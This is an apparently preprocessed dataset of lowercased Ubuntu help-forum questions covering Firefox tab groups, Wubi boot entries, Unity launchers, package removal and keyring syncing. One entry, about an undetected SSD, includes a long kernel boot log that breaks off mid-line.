106701	restore firefox group tabs and previously opened tabs	yesterday while i closed firefox ( latest 10.1 ) , i noticed firefox window left behind , which was just some popup browser window from google when i tested a page design ( how would it look on a mobile phone ) . so i closed that window afterwards also . today i open firefox and instead expected leftover tabs , i see only this tiny firefox window ( from phone design test ) , without tabs . even more importantly i had tab groups which also disappeared , just because i forgot that browser popup window was left behind before closing firefox . can i restore group tabs ?
106702	tethered camera shooting	what is recommended for ( tethered shooting ) using nikon and canon cameras . should be able to zoom , focus and shoot from input device , mouse/keyboard or preferred touch-pad on laptop . connection via usb a must . does not have to include editing software .
106708	what weather monitor ( weather station ) software is available ?	ubuntu 12.04 or 12.10 need a application and or recommendation for a monitoring system . it will be set up locally and used to record essential data , reports to channels such as : the weather channel - weather underground - accuweather etc .
106717	how to remove all installed packages that depends on specific package	when i want to install a specific package ( with synaptic ) that depends on some other packages , i have to install them too . but i want to remove this specific package , i want the dependencies to be removed too .
106724	syncing a gnome-keyring across devices w/ubuntu one	i wrote an app that creates and uses its own keyring . i 'd like to have that keyring with secrets attributes and all sync via u1 so that the same passwords are available on all the linux devices . how do you determine if u1 is setup on a users system ? does u1 provide any option for syncing the users keyring ? if not , what would the preferred programmatic approach be ? what special considerations when using u1 should be taken into account to ensure security ? are there any , or is this something more left to the developer tying into u1 ? http : //binbrain.github.com/opensesame/ i 'm looking for official documentation or pointers covering the above questions .
106725	ubuntu is not listed in boot menu after wubi installation win 7	i have installed ubuntu using wubi in win 7 . when i restart my computer it is not showing the list of ubuntu in the list of operating system . i have checked in my computer- > properties- > advanced- > under startup and recovery settings- > time to display operating systems is 10 seconds . am i doing something wrong ?
106729	installed ubuntu 11.10 , but desk is empty , pc doens't do anything	i 've just installed ubuntu 11.10 on my super-old toshiba satelite . after the install , the pc reboots and i entered the log-in screen . entered pw and after that step , the pc does n't do anything . i can move the mouse-coursor around , but no icons , no bars , nothing appear . do you have a workaround for me ? thanks
106731	unity 2d and 3d both running	ok . i installed ubuntu 11.10 on my computer and everything works fine . i installed compiz config settings , and it shows that the ubuntu unity plugin is unchecked . i researched and found out that i am running unity 2d ( even when i log in under `` ubuntu '' ) . when i check the ubuntu unity plugin in compiz , it opens unity 3d ( i assume ) . but the unity 2d launcher is still running . they are on top of each other and the icons in the 3d launcher are not visible , however when i run my cursor over them , the bubbles show up ( firefox , dash home , etc.. ) how can i disable unity 2d and enable just the 3d ? and how can i make the icons visible ?
106735	is it possible to create ubuntu shirts ( merchandise )	i wish to create a couple of ubuntu shirts as prize for a coming event . in my country it is very difficult to get dollars ( $ ) , euros or any coin . this is the reason for making them here instead of buying them from the store . will there be any problem in making them . some of them will be similar to the ones in the ubuntu store but others will have other ubuntu stuff .
106738	maximizing window makes content disappear	i am working on a dv9700 hp laptop . i just installed ubuntu 11.10 and the proprietary drivers for the nvidia geforce 7150m / nforce 630m . when maximing any window , this means the terminal , nautilus , libreoffice , etc.. the content in the windows disappears . i can resize it again to the default and it will show but if i maximize it the content will disappear . what can be done in this situation . using unity .
106740	is it possible to use two file managers at the same time ?	i have no problem with nautilus , but i '' m used to midnight commander and it would be wonderful if i could have both of them working together .
106743	ssd not found during installation	while i was trying to install ubuntu to my hard drive ( which is an ssd , maybe 2 years old ) and it just ca n't seem to locate the drive as if it does n't exist . i 've tried rebooting multiple times , unplugging all the other driver etc ... nothing seems to help , does anybody have some ideas how i 'd be able to fix this ? i 'd really like a dual-boot i 'm getting sick of windows kingston snv425s264gb firmware : c091 ssd 64gb 110/200 vdtb 2.5 kin driver version ; 5.1.2535.0 [ 4.986663 ] [ drm ] dfp3 : internal_uniphy [ 4.986706 ] [ drm ] crt1 : internal_kldscp_dac1 [ 5.016547 ] firewire_ohci : added fw-ohci device 0000:0c:03.0 , ohci v1.10 , 4 ir + 8 it contexts , quirks 0x11 [ 5.284075 ] ata5 : sata link down ( sstatus 0 scontrol 300 ) [ 5.288087 ] ata6 : sata link down ( sstatus 0 scontrol 300 ) [ 5.463792 ] [ drm ] radeon display connector dp-1 : no monitor connected or invalid edid [ 5.515756 ] firewire_core : created device fw0 : guid 001e8c0000c81348 , s400 [ 5.568992 ] [ drm ] radeon display connector hdmi-a-1 : found valid edid [ 5.622496 ] [ drm ] radeon display connector dvi-i-1 : found valid edid [ 5.622583 ] [ drm ] internal thermal controller with fan control [ 5.622698 ] [ drm ] radeon : power management initialized [ 5.678152 ] usbcore : registered new interface driver uas [ 5.678793 ] initializing usb mass storage driver ... [ 5.678939 ] scsi8 : usb-storage 1-1.3:1.0 [ 5.679053 ] usbcore : registered new interface driver usb-storage [ 5.679100 ] usb mass storage support registered . [ 5.747413 ] usb 1-1.4 : new high speed usb device number 4 using ehci_hcd [ 5.821222 ] [ drm ] fb mappable at 0xe0141000 [ 5.821266 ] [ drm ] vram apper at 0xe0000000 [ 5.821308 ] [ drm ] size 8294400 [ 5.821350 ] [ drm ] fb depth is 24 [ 5.821391 ] [ drm ] pitch is 7680 [ 5.821463 ] fbcon : radeondrmfb ( fb0 ) is primary device [ 5.849482 ] scsi9 : usb-storage 1-1.4:1.0 [ 5.919314 ] usb 1-1.5 : new full speed usb device number 5 using ehci_hcd [ 6.013337 ] hub 1-1.5:1.0 : usb hub found [ 6.013522 ] hub 1-1.5:1.0 : 3 ports detected [ 6.083036 ] usb 1-1.6 : new full speed usb device number 6 using ehci_hcd [ 6.182767 ] input : logitech usb receiver as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6/1-1.6:1.0/input/input2 [ 6.182844 ] generic-usb 0003:046d : c52b.0001 : input , hidraw0 : usb hid v1.11 keyboard [ logitech usb receiver ] on usb-0000:00:1a.0-1.6/input0 [ 6.184851 ] input : logitech usb receiver as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6/1-1.6:1.1/input/input3 [ 6.185103 ] generic-usb 0003:046d : c52b.0002 : input , hiddev0 , hidraw1 : usb hid v1.11 mouse [ logitech usb receiver ] on usb-0000:00:1a.0-1.6/input1 [ 6.187872 ] generic-usb 0003:046d : c52b.0003 : hiddev0 , hidraw2 : usb hid v1.11 device [ logitech usb receiver ] on usb-0000:00:1a.0-1.6/input2 [ 6.187895 ] usbcore : registered new interface driver usbhid [ 6.187896 ] usbhid : usb hid core driver [ 6.250680 ] usb 2-1.1 : new high speed usb device number 3 using ehci_hcd [ 6.259316 ] console : switching to colour frame buffer device 240x67 [ 6.263262 ] fb0 : radeondrmfb frame buffer device [ 6.263263 ] drm : registered panic notifier [ 6.263298 ] [ drm ] initialized radeon 2.10.0 20080528 for 0000:01:00.0 on minor 0 [ 6.630088 ] usb 2-1.2 : new high speed usb device number 4 using ehci_hcd [ 6.684730 ] scsi 8:0:0:0 : direct-access generic- compact flash 1.00 pq : 0 ansi : 0 ccs [ 6.691228 ] scsi 8:0:0:1 : direct-access generic- sm/xd-picture 1.00 pq : 0 ansi : 0 ccs [ 6.697692 ] scsi 8:0:0:2 : direct-access generic- sd/mmc 1.00 pq : 0 ansi : 0 ccs [ 6.704183 ] scsi 8:0:0:3 : direct-access generic- ms/ms-pro 1.00 pq : 0 ansi : 0 ccs [ 6.723704 ] scsi10 : usb-storage 2-1.2:1.0 [ 6.775943 ] btrfs loaded [ 6.779953 ] xor : automatically using best checksumming function : generic_sse [ 6.793807 ] usb 2-1.3 : new low speed usb device number 5 using ehci_hcd [ 6.797638 ] generic_sse : 12807.000 mb/sec [ 6.797643 ] xor : using function : generic_sse ( 12807.000 mb/sec ) [ 6.799018 ] device-mapper : dm-raid45 : initialized v0.2594b [ 6.897689 ] input : logitech usb receiver as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/input/input4 [ 6.897764 ] generic-usb 0003:046d : c508.0004 : input , hidraw3 : usb hid v1.10 mouse [ logitech usb receiver ] on usb-0000:00:1d.0-1.3/input0 [ 6.969663 ] usb 2-1.4 : new high speed usb device number 6 using ehci_hcd [ 7.063246 ] scsi11 : usb-storage 2-1.4:1.0 [ 7.121527 ] sd 8:0:0:0 : attached scsi generic sg1 type 0 [ 7.121619 ] sd 8:0:0:1 : attached scsi generic sg2 type 0 [ 7.121806 ] sd 8:0:0:2 : attached scsi generic sg3 type 0 [ 7.121934 ] sd 8:0:0:3 : attached scsi generic sg4 type 0 [ 7.137287 ] usb 2-1.5 : new high speed usb device number 7 using ehci_hcd [ 7.143640 ] sd 8:0:0:1 : [ sdb ] attached scsi removable disk [ 7.146229 ] sd 8:0:0:2 : [ sdc ] attached scsi removable disk [ 7.147380 ] sd 8:0:0:3 : [ sdd ] attached scsi removable disk [ 7.152561 ] sd 8:0:0:0 : [ sda ] attached scsi removable disk [ 7.235935 ] scsi12 : usb-storage 2-1.5:1.0 [ 7.309004 ] usb 2-1.7 : new low speed usb device number 8 using ehci_hcd [ 7.412950 ] input : logitech usb receiver as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.7/2-1.7:1.0/input/input5 [ 7.413019 ] logitech 0003:046d : c517.0005 : input , hidraw4 : usb hid v1.10 keyboard [ logitech usb receiver ] on usb-0000:00:1d.0-1.7/input0 [ 7.418375 ] logitech 0003:046d : c517.0006 : fixing up logitech keyboard report descriptor [ 7.418716 ] input : logitech usb receiver as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.7/2-1.7:1.1/input/input6 [ 7.418826 ] logitech 0003:046d : c517.0006 : input , hiddev0 , hidraw5 : usb hid v1.10 mouse [ logitech usb receiver ] on usb-0000:00:1d.0-1.7/input1 [ 7.480908 ] usb 2-1.8 : new high speed usb device number 9 using ehci_hcd [ 7.590643 ] scsi13 : usb-storage 2-1.8:1.0 [ 7.660568 ] usb 1-1.5.1 : new full speed usb device number 7 using ehci_hcd [ 7.754942 ] scsi 10:0:0:0 : direct-access wdc wd10 tpvt-00u4rt1 01.0 pq : 0 ansi : 2 ccs [ 7.756787 ] input : hid 0a5c:4502 as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.5/1-1.5.1/1-1.5.1:1.0/input/input7 [ 7.756865 ] generic-usb 0003:0a5c:4502.0007 : input , hidraw6 : usb hid v1.11 keyboard [ hid 0a5c:4502 ] on usb-0000:00:1a.0-1.5.1/input0 [ 7.836358 ] usb 1-1.5.2 : new full speed usb device number 8 using ehci_hcd [ 7.934097 ] input : hid 0a5c:4503 as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.5/1-1.5.2/1-1.5.2:1.0/input/input8 [ 7.934177 ] generic-usb 0003:0a5c:4503.0008 : input , hidraw7 : usb hid v1.11 mouse [ hid 0a5c:4503 ] on usb-0000:00:1a.0-1.5.2/input0 [ 8.008059 ] usb 1-1.5.3 : new full speed usb device number 9 using ehci_hcd [ 8.061332 ] scsi 11:0:0:0 : direct-access wd my passport 070b 1032 pq : 0 ansi : 4 [ 8.062290 ] scsi 11:0:0:1 : enclosure wd ses device 1032 pq : 0 ansi : 4 [ 8.236813 ] scsi 12:0:0:0 : direct-access kingston datatraveler 2.0 pmap pq : 0 ansi : 0 ccs [ 8.592581 ] scsi 13:0:0:0 : direct-access iomega e xternal hd 0000 pq : 0 ansi : 4 [ 8.882015 ] scsi 9:0:0:0 : direct-access samsung hm641ji pq : 0 ansi : 2 ccs [ 8.910861 ] sd 9:0:0:0 : attached scsi generic sg5 type 0 [ 8.911069 ] sd 10:0:0:0 : attached scsi generic sg6 type 0 [ 8.911196 ] sd 11:0:0:0 : attached scsi generic sg7 type 0 [ 8.911352 ] scsi 11:0:0:1 : attached scsi generic sg8 type 13 [ 8.911591 ] sd 12:0:0:0 : attached scsi generic sg9 type 0 [ 8.911852 ] sd 11:0:0:0 : [ sdg ] 975400960 512-byte logical blocks : ( 499 gb/465 gib ) [ 8.911860 ] sd 13:0:0:0 : attached scsi generic sg10 type 0 [ 8.912718 ] sd 13:0:0:0 : [ sdi ] 976773168 512-byte logical blocks : ( 500 gb/465 gib ) [ 8.912722 ] sd 12:0:0:0 : [ sdh ] 31375360 512-byte logical blocks : ( 16.0 gb/14.9 gib ) [ 8.913418 ] sd 12:0:0:0 : [ sdh ] write protect is off [ 8.913422 ] sd 12:0:0:0 : [ sdh ] mode sense : 23 00 00 00 [ 8.913594 ] sd 11:0:0:0 : [ sdg ] write protect is off [ 8.913598 ] sd 11:0:0:0 : [ sdg ] mode sense : 23 00 10 00 [ 8.913718 ] sd 10:0:0:0 : [ sdf ] 1953525168 512-byte logical blocks : ( 1.00 tb/931 gib ) [ 8.913964 ] sd 12:0:0:0 : [ sdh ] no caching mode page present [ 8.913966 ] sd 12:0:0:0 : [ sdh ] assuming drive cache : write through [ 8.914586 ] sd 10:0:0:0 : [ sdf ] write protect is off [ 8.914590 ] sd 10:0:0:0 : [ sdf ] mode sense : 28 00 00 00 [ 8.915335 ] sd 10:0:0:0 : [ sdf ] no caching mode page present [ 8.915337 ] sd 10:0:0:0 : [ sdf ] assuming drive cache : write through [ 8.915463 ] sd 11:0:0:0 : [ sdg ] no caching mode page present [ 8.915465 ] sd 11:0:0:0 : [ sdg ] assuming drive cache : write through [ 8.917470 ] sd 10:0:0:0 : [ sdf ] no caching mode page present [ 8.917475 ] sd 10:0:0:0 : [ sdf ] assuming drive cache : write through [ 8.919147 ] sd 13:0:0:0 : [ sdi ] write protect is off [ 8.919150 ] sd 13:0:0:0 : [ sdi ] mode sense : 38 00 00 00 [ 8.919603 ] sd 11:0:0:0 : [ sdg ] no caching mode page present [ 8.919608 ] sd 11:0:0:0 : [ sdg ] assuming drive cache : write through [ 8.920274 ] sdg : sdg1 [ 8.925532 ] sd 13:0:0:0 : [ sdi ] no caching mode page present [ 8.925538 ] sd 13:0:0:0 : [ sdi ] assuming drive cache : write through [ 8.927768 ] sd 11:0:0:0 : [ sdg ] no caching mode page present [ 8.927774 ] sd 11:0:0:0 : [ sdg ] assuming drive cache : write through [ 8.927779 ] sd 11:0:0:0 : [ sdg ] attached scsi disk [ 8.939473 ] sd 13:0:0:0 : [ sdi ] no caching mode page present [ 8.939479 ] sd 13:0:0:0 : [ sdi ] assuming drive cache : write through [ 8.959174 ] sdi : sdi1 [ 8.983309 ] sd 13:0:0:0 : [ sdi ] no caching mode page present [ 8.983315 ] sd 13:0:0:0 : [ sdi ] assuming drive cache : write through [ 8.983320 ] sd 13:0:0:0 : [ sdi ] attached scsi disk [ 9.212316 ] sdf : sdf1 [ 9.230266 ] sd 10:0:0:0 : [ sdf ] no caching mode page present [ 9.230268 ] sd 10:0:0:0 : [ sdf ] assuming drive cache : write through [ 9.230270 ] sd 10:0:0:0 : [ sdf ] attached scsi disk [ 11.610888 ] sd 9:0:0:0 : [ sde ] 1250263728 512-byte logical blocks : ( 640 gb/596 gib ) [ 11.611755 ] sd 9:0:0:0 : [ sde ] write protect is off [ 11.611772 ] sd 9:0:0:0 : [ sde ] mode sense : 28 00 00 00 [ 11.612565 ] sd 9:0:0:0 : [ sde ] no caching mode page present [ 11.612581 ] sd 9:0:0:0 : [ sde ] assuming drive cache : write through [ 11.615198 ] sd 9:0:0:0 : [ sde ] no caching mode page present [ 11.615215 ] sd 9:0:0:0 : [ sde ] assuming drive cache : write through [ 11.615786 ] sde : sde1 [ 11.640438 ] sd 9:0:0:0 : [ sde ] no caching mode page present [ 11.640462 ] sd 9:0:0:0 : [ sde ] assuming drive cache : write through [ 11.640484 ] sd 9:0:0:0 : [ sde ] attached scsi disk [ 11.914038 ] sd 12:0:0:0 : [ sdh ] no caching mode page present [ 11.914062 ] sd 12:0:0:0 : [ sdh ] assuming drive cache : write through [ 11.914663 ] sdh : [ 11.916917 ] sd 12:0:0:0 : [ sdh ] no caching mode page present [ 11.916946 ] sd 12:0:0:0 : [ sdh ] assuming drive cache : write through [ 11.916974 ] sd 12:0:0:0 : [ sdh ] attached scsi removable disk [ 11.917312 ] ses 11:0:0:1 : attached enclosure device [ 14.221690 ] squashfs : version 4.0 ( 2009/01/31 ) phillip lougher [ 21.855658 ] udevd [ 1656 ] : starting version 173 [ 21.991038 ] bluetooth : core ver 2.16 [ 21.991056 ] net : registered protocol family 31 [ 21.991058 ] bluetooth : hci device and connection manager initialized [ 21.991060 ] bluetooth : hci socket layer initialized [ 21.991061 ] bluetooth : l2cap socket layer initialized [ 21.991894 ] bluetooth : sco socket layer initialized [ 22.051657 ] cfg80211 : calling crda to update world regulatory domain [ 22.073893 ] atk0110 atk0110:00 : ec enabled [ 22.076965 ] bluetooth : generic bluetooth usb driver ver 0.6 [ 22.077088 ] usbcore : registered new interface driver btusb [ 22.138897 ] edac mc : ver:2.1.0 [ 22.160301 ] edac mc0 : giving out device to 'i7core_edac.c ' 'i7 core # 0 ' : dev 0000:3f:03.0 [ 22.160319 ] edac pci0 : giving out device to module 'i7core_edac ' controller 'edac pci controller ' : dev '0000:3f:03.0 ' ( polled ) [ 22.160322 ] edac i7core : driver loaded . [ 22.208906 ] linux video capture interface : v2.00 [ 22.236678 ] uvcvideo : found uvc 1.00 device ( 046d:081b ) [ 22.251510 ] input : uvc camera ( 046d:081b ) as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.1/2-1.1:1.0/input/input9 [ 22.251622 ] usbcore : registered new interface driver uvcvideo [ 22.251624 ] usb video class driver ( v1.1.0 ) [ 22.325240 ] cfg80211 : world regulatory domain updated : [ 22.325242 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 22.325244 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 22.325246 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 22.325248 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 22.325249 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 22.325251 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 22.363308 ] ir nec protocol handler initialized [ 22.377463 ] saa7130/34 : v4l2 driver version0.2.16 loaded [ 22.377513 ] saa7134 0000:0c:01.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 22.377518 ] saa7133 [ 0 ] : found at 0000:0c:01.0 , rev : 209 , irq : 16 , latency : 64 , mmio : 0xf7fff800 [ 22.377524 ] saa7133 [ 0 ] : subsystem : 1043:4845 , board : asus tv-fm 7135 [ card=53 , autodetected ] [ 22.377547 ] saa7133 [ 0 ] : board init : gpio is 0 [ 22.386031 ] ir rc5 ( x ) protocol handler initialized [ 22.400233 ] ir rc6 protocol handler initialized [ 22.423367 ] hda intel 0000:00:1b.0 : pci int a - > gsi 22 ( level , low ) - > irq 22 [ 22.423412 ] hda intel 0000:00:1b.0 : irq 61 for msi/msi-x [ 22.423432 ] hda intel 0000:00:1b.0 : setting latency timer to 64 [ 22.424177 ] ir jvc protocol handler initialized [ 22.427738 ] ir sony protocol handler initialized [ 22.456473 ] lirc_dev : ir remote control driver registered , major 249 [ 22.465289 ] ir lirc bridge handler initialized [ 22.477705 ] hda intel 0000:01:00.1 : pci int b - > gsi 17 ( level , low ) - > irq 17 [ 22.477827 ] hda intel 0000:01:00.1 : irq 62 for msi/msi-x [ 22.477847 ] hda intel 0000:01:00.1 : setting latency timer to 64 [ 22.503770 ] hdmi status : pin=3 presence_detect=0 eld_valid=0 [ 22.503847 ] input : hd-audio generic hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:03.0/0000:01:00.1/sound/card2/input10 [ 22.528561 ] saa7133 [ 0 ] : i2c eeprom 00 : 43 10 45 48 54 20 1c 00 43 43 a9 1c 55 d2 b2 92 [ 22.528567 ] saa7133 [ 0 ] : i2c eeprom 10 : 00 ff e2 0f ff 20 ff ff ff ff ff ff ff ff ff ff [ 22.528572 ] saa7133 [ 0 ] : i2c eeprom 20 : 01 40 01 02 03 01 01 03 08 ff 00 88 ff ff ff ff [ 22.528578 ] saa7133 [ 0 ] : i2c eeprom 30 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 22.528583 ] saa7133 [ 0 ] : i2c eeprom 40 : ff 22 00 c2 96 ff 02 30 15 ff ff ff ff ff ff ff [ 22.528588 ] saa7133 [ 0 ] : i2c eeprom 50 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 22.528593 ] saa7133 [ 0 ] : i2c eeprom 60 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 22.528598 ] saa7133 [ 0 ] : i2c eeprom 70 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 22.528603 ] saa7133 [ 0 ] : i2c eeprom 80 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 22.528608 ] saa7133 [ 0 ] : i2c eeprom 90 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 22.528613 ] saa7133 [ 0 ] : i2c eeprom a0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 22.528618 ] saa7133 [ 0 ] : i2c eeprom b0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 22.528623 ] saa7133 [ 0 ] : i2c eeprom c0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 22.528628 ] saa7133 [ 0 ] : i2c eeprom d0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 22.528633 ] saa7133 [ 0 ] : i2c eeprom e0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 22.528638 ] saa7133 [ 0 ] : i2c eeprom f0 : ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 22.528645 ] saa7133 [ 0 ] : p7131 analog only , using entry of asustek p7131 analog [ 22.580475 ] registered ir keymap rc-asus-pc39 [ 22.580538 ] input : saa7134 ir ( asustek p7131 analo as /devices/pci0000:00/0000:00:1e.0/0000:0c:01.0/rc/rc0/input11 [ 22.580580 ] rc0 : saa7134 ir ( asustek p7131 analo as /devices/pci0000:00/0000:00:1e.0/0000:0c:01.0/rc/rc0 [ 22.580675 ] rc rc0 : lirc_dev : driver ir-lirc-codec ( saa7134 ) registered at minor = 0 [ 22.591564 ] i2c-core : driver [ tuner ] using legacy suspend method [ 22.591566 ] i2c-core : driver [ tuner ] using legacy resume method [ 22.644511 ] tuner 9-004b : tuner -1 found with type ( s ) radio tv . [ 22.739986 ] init : failsafe main process ( 2041 ) killed by term signal [ 22.740309 ] init : alsa-restore main process ( 2339 ) terminated with status 99 [ 22.744161 ] tda829x 9-004b : setting tuner address to 61 [ 22.750445 ] r8169 0000:05:00.0 : eth0 : link down [ 22.751189 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 22.803523 ] r8169 0000:04:00.0 : eth1 : link down [ 22.803529 ] r8169 0000:04:00.0 : eth1 : link down [ 22.804362 ] addrconf ( netdev_up ) : eth1 : link is not ready [ 22.820043 ] tda829x 9-004b : type set to tda8290+75a [ 22.908087 ] bluetooth : rfcomm tty layer initialized [ 22.908092 ] bluetooth : rfcomm socket layer initialized [ 22.908093 ] bluetooth : rfcomm ver1.11 [ 22.914275 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 22.914278 ] bluetooth : bnep filters : protocol multicast [ 23.407602 ] 3:3:1 : can not set freq 16000 to ep 0x86 [ 23.555851 ] usbcore : registered new interface driver snd-usb-audio [ 24.456867 ] r8169 0000:04:00.0 : eth1 : link up [ 24.457387 ] addrconf ( netdev_change ) : eth1 : link becomes ready [ 26.610335 ] saa7133 [ 0 ] : registered device video1 [ v4l2 ] [ 26.610382 ] saa7133 [ 0 ] : registered device vbi0 [ 26.610412 ] saa7133 [ 0 ] : registered device radio0 [ 26.610580 ] ath9k 0000:0c:02.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 26.619689 ] saa7134 alsa driver for dma sound loaded [ 26.619706 ] saa7133 [ 0 ] /alsa : saa7133 [ 0 ] at 0xf7fff800 irq 16 registered as card -2 [ 27.465622 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 27.470360 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 28.170129 ] ath : eeprom regdomain : 0x809c [ 28.170131 ] ath : eeprom indicates we should expect a country code [ 28.170132 ] ath : doing eeprom country- > regdmn map search [ 28.170133 ] ath : country maps to regdmn code : 0x52 [ 28.170134 ] ath : country alpha2 being used : cn [ 28.170135 ] ath : regpair used : 0x52 [ 28.170138 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : [ 28.170140 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 28.170141 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : [ 28.170143 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 28.170144 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : [ 28.170146 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 28.170148 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : [ 28.170149 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 28.170151 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : [ 28.170153 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 28.170154 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : [ 28.170156 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 28.170157 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : [ 28.170159 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 28.170160 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : [ 28.170162 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 28.170164 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : [ 28.170165 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 28.170167 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : [ 28.170169 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 28.170170 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : [ 28.170172 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 28.170173 ] cfg80211 : disabling freq 2467 mhz as custom regd has no rule that fits a 20 mhz wide channel [ 28.170175 ] cfg80211 : disabling freq 2472 mhz as custom regd has no rule that fits a 20 mhz wide channel [ 28.170176 ] cfg80211 : disabling freq 2484 mhz as custom regd has no rule that fits a 20 mhz wide channel [ 28.172672 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : [ 28.172674 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 28.172677 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : [ 28.172679 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 28.172681 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : [ 28.172684 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 28.172685 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : [ 28.172688 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 28.172690 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : [ 28.172693 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 28.172694 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : [ 28.172697 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 28.172698 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : [ 28.172700 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 28.172701 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : [ 28.172703 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 28.172705 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : [ 28.172706 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 28.172708 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : [ 28.172710 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 28.172711 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : [ 28.172713 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 28.172714 ] cfg80211 : updating information on frequency 2467 mhz for a 20 mhz width channel with regulatory rule : [ 28.172716 ] cfg80211 : 2457000 khz - 2482000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 28.172717 ] cfg80211 : updating information on frequency 2472 mhz for a 20 mhz width channel with 